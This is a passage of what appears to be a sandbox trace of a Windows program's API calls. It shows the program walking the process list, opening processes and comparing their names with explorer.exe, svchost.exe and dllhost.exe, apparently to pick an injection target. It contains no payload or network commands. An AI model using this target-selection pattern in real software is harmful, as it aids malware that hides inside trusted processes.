lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0245.121] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0245.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0245.121] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0245.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0245.122] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0245.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0245.122] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0245.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0245.123] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0245.123] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0245.124] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0245.124] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0245.125] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0245.125] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0245.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0245.126] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0245.126] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0245.127] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0245.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0245.127] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.127] CloseHandle (hObject=0xd8) returned 1 [0245.127] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0245.127] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0245.127] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0245.127] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0245.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0245.128] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0245.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0245.128] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.128] CloseHandle (hObject=0xd8) returned 1 [0245.128] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0245.128] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0245.128] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0245.128] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0245.129] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0245.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0245.129] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0245.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0245.130] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.130] CloseHandle (hObject=0xd8) returned 1 [0245.130] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0245.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0245.130] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.131] CloseHandle (hObject=0xd8) returned 1 [0245.131] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0245.131] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0245.131] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.131] CloseHandle (hObject=0xd8) returned 1 [0245.131] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0245.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0245.132] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.132] CloseHandle (hObject=0xd8) returned 1 [0245.132] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0245.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0245.133] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.133] CloseHandle (hObject=0xd8) returned 1 [0245.133] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0245.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0245.133] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.134] CloseHandle (hObject=0xd8) returned 1 [0245.134] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0245.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0245.134] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.134] CloseHandle (hObject=0xd8) returned 1 [0245.134] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0245.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0245.135] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.135] CloseHandle (hObject=0xd8) returned 1 [0245.135] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0245.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0245.135] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.135] CloseHandle (hObject=0xd8) returned 1 [0245.135] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0245.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0245.136] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.136] CloseHandle (hObject=0xd8) returned 1 [0245.136] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0245.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0245.136] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.136] CloseHandle (hObject=0xd8) returned 1 [0245.136] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0245.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0245.137] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.137] CloseHandle (hObject=0xd8) returned 1 [0245.137] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0245.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0245.138] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.138] CloseHandle (hObject=0xd8) returned 1 [0245.138] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0245.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0245.138] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.138] CloseHandle (hObject=0xd8) returned 1 [0245.138] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0245.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0245.139] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.139] CloseHandle (hObject=0xd8) returned 1 [0245.139] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0245.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0245.139] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.139] CloseHandle (hObject=0xd8) returned 1 [0245.139] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0245.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0245.140] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.140] CloseHandle (hObject=0xd8) returned 1 [0245.140] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0245.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0245.141] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.141] CloseHandle (hObject=0xd8) returned 1 [0245.141] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0245.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0245.141] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.141] CloseHandle (hObject=0xd8) returned 1 [0245.141] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0245.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0245.142] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.142] CloseHandle (hObject=0xd8) returned 1 [0245.142] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0245.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0245.142] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.142] CloseHandle (hObject=0xd8) returned 1 [0245.142] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0245.143] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0245.143] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0245.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0245.144] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0245.144] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0245.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0245.145] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0245.145] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.145] CloseHandle (hObject=0xd8) returned 1 [0245.145] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0245.145] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0245.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0245.146] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.146] CloseHandle (hObject=0xd8) returned 1 [0245.146] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0245.146] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0245.146] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0245.146] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0245.147] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0245.147] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.147] CloseHandle (hObject=0xd8) returned 1 [0245.147] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0245.148] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.148] CloseHandle (hObject=0xd8) returned 1 [0245.148] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0245.148] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0245.148] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0245.149] CloseHandle (hObject=0xd8) returned 1 [0245.149] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.149] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, 